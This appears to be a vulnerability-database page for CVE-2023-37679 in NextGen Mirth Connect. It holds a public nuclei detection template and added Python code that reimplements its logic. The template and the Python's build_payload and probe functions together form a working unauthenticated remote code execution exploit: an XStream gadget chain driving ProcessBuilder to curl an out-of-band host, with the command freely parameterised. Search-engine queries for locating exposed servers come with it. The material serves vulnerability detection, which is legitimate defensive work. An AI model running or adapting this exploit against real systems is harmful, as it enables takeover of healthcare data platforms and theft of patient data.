CVE-2023-37679: NextGen Mirth Connect - Remote Code Execution

Date: 2025-08-01 | Affected software: NextGen Mirth Connect | PoC: public

Vulnerability description

Mirth Connect, by NextGen HealthCare, is an open source data integration platform widely used by healthcare companies. Versions prior to 4.4.1 are vulnerable to unauthenticated remote code execution. The nuclei template below first reads the version from GET /api/server/version, then POSTs an XStream document to /api/users in which a dynamic-proxy backed by a java.beans.EventHandler drives java.lang.ProcessBuilder; the POST itself is expected to fail with a 500 after the command has already run, and execution is confirmed by the out-of-band DNS callback.

PoC code [public]

id: CVE-2023-37679

info:
  name: NextGen Mirth Connect - Remote Code Execution
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    Mirth Connect, by NextGen HealthCare, is an open source data integration platform widely used by healthcare companies. Versions prior to 4.4.1 are vulnerable to an unauthenticated remote code execution vulnerability
  reference:
    - https://www.horizon3.ai/nextgen-mirth-connect-remote-code-execution-vulnerability-cve-2023-43208/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-37679
    - http://mirth.com
    - http://nextgen.com
    - http://packetstormsecurity.com/files/176920/Mirth-Connect-4.4.0-Remote-Command-Execution.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-37679
    cwe-id: CWE-77
    epss-score: 0.93688
    epss-percentile: 0.99843
    cpe: cpe:2.3:a:nextgen:mirth_connect:4.3.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: nextgen
    product: mirth_connect
    shodan-query:
      - title:"mirth connect administrator"
      - http.title:"mirth connect administrator"
    fofa-query: title="mirth connect administrator"
    google-query: intitle:"mirth connect administrator"
  tags: packetstorm,cve2023,cve,nextgen,rce

http:
  - raw:
      - |
        GET /api/server/version HTTP/1.1
        Host: {{Hostname}}
        X-Requested-With: OpenAPI
      - |
        POST /api/users HTTP/1.1
        Host: {{Hostname}}
        X-Requested-With: OpenAPI
        Content-Type: application/xml

        <sorted-set>
            <string>foo</string>
            <dynamic-proxy>
                <interface>java.lang.Comparable</interface>
                <handler class="java.beans.EventHandler">
                    <target class="java.lang.ProcessBuilder">
                        <command>
                            <string>curl</string>
                            <string>http://{{interactsh-url}}/</string>
                        </command>
                    </target>
                    <action>start</action>
                </handler>
            </dynamic-proxy>
        </sorted-set>

    matchers:
      - type: dsl
        dsl:
          - 'compare_versions(version, "<4.4.1")'
          - 'contains(interactsh_protocol, "dns")'
          - 'status_code_1 == 200 && status_code_2 == 500'
        condition: and

    extractors:
      - type: regex
        part: body_1
        name: version
        group: 1
        regex:
          - '(.*)'
        internal: true
# digest: 490a004630440220342a8a5148a8d901d4dfbd104fa6176e9b2db6ad97740584d51b4d978bb80f1202207c1f89423af5c7d2805397dd165888061e3e6d5d70ca95a8583179294f325c81:922c64590222798bb761d5b6d8e72950
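The following Python is an added companion to the template above; it is not part of the original page, the nuclei template, or Mirth Connect. It reimplements the template's three pieces of logic as plain functions so they can be reviewed and unit-tested offline: the version gate (compare_versions against 4.4.1), the XStream gadget document (same sorted-set / dynamic-proxy / java.beans.EventHandler / ProcessBuilder structure, with the argv parameterised), and the AND-ed matcher. The function names parse_version, is_affected, build_payload, matches and probe are my own; the header, paths and payload structure are copied from the template. probe() performs the live two-request check with urllib and needs a target plus an out-of-band listener you control for the callback; it is the only part that touches the network.

```python
"""Offline companion to the CVE-2023-37679 nuclei template (added example)."""
import re
import xml.etree.ElementTree as ET
from urllib import error, request

FIXED_VERSION = (4, 4, 1)  # template gate: compare_versions(version, "<4.4.1")


def parse_version(text):
    """'4.4.0' -> (4, 4, 0); a trailing suffix such as '-SNAPSHOT' is ignored."""
    m = re.match(r"\s*(\d+)(?:\.(\d+))?(?:\.(\d+))?", text)
    if not m:
        raise ValueError("unparseable version: %r" % text)
    return tuple(int(g) if g else 0 for g in m.groups())


def is_affected(version_text):
    """True when the reported version is older than 4.4.1."""
    return parse_version(version_text) < FIXED_VERSION


def build_payload(command):
    """Return the XStream document the template POSTs to /api/users.

    The sorted-set -> dynamic-proxy -> java.beans.EventHandler ->
    java.lang.ProcessBuilder structure is copied from the template; only the
    argv list is parameterised (the template uses ['curl', 'http://<oob>/']).
    ElementTree escapes '&', '<' and '>' so arbitrary argv is safe to embed.
    """
    root = ET.Element("sorted-set")
    ET.SubElement(root, "string").text = "foo"
    proxy = ET.SubElement(root, "dynamic-proxy")
    ET.SubElement(proxy, "interface").text = "java.lang.Comparable"
    handler = ET.SubElement(proxy, "handler", {"class": "java.beans.EventHandler"})
    target = ET.SubElement(handler, "target", {"class": "java.lang.ProcessBuilder"})
    cmd = ET.SubElement(target, "command")
    for arg in command:
        ET.SubElement(cmd, "string").text = arg
    ET.SubElement(handler, "action").text = "start"
    return ET.tostring(root, encoding="unicode")


def matches(version_text, status_1, status_2, oob_protocols):
    """The template's three matcher conditions, AND-ed together.

    status_2 == 500 is expected: the command runs while XStream is still
    building the object graph (TreeSet.add -> compareTo on the proxy ->
    EventHandler -> ProcessBuilder.start), and the request then errors out.
    The DNS hit on the out-of-band listener is the actual proof of execution.
    """
    return (
        is_affected(version_text)
        and "dns" in oob_protocols
        and status_1 == 200
        and status_2 == 500
    )


def probe(base_url, callback_url, timeout=10):
    """Live check (needs network; not exercised offline).

    Returns (version_text, status_1, status_2) for matches(); the caller must
    check its own out-of-band listener for the DNS/HTTP hit from callback_url.
    """
    base = base_url.rstrip("/")
    hdrs = {"X-Requested-With": "OpenAPI"}  # header the template sends on every request
    req = request.Request(base + "/api/server/version", headers=hdrs)
    with request.urlopen(req, timeout=timeout) as resp:
        version_text = resp.read().decode("utf-8", "replace").strip()
        status_1 = resp.status
    body = build_payload(["curl", callback_url]).encode("utf-8")
    req = request.Request(base + "/api/users", data=body, method="POST",
                          headers={**hdrs, "Content-Type": "application/xml"})
    try:
        with request.urlopen(req, timeout=timeout) as resp:
            status_2 = resp.status
    except error.HTTPError as e:  # a 500 is the expected outcome; keep its code
        status_2 = e.code
    return version_text, status_1, status_2
```

Usage: `v, s1, s2 = probe("https://mirth.example:8443", "http://<your-oob-host>/")`, then `matches(v, s1, s2, protocols_seen_on_listener)`. Note that the version gate alone is only a weak signal: a patched 4.4.1 host that still returns 500 on the POST without any callback must not be reported, which is why the template AND-s all three conditions rather than trusting the status codes.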
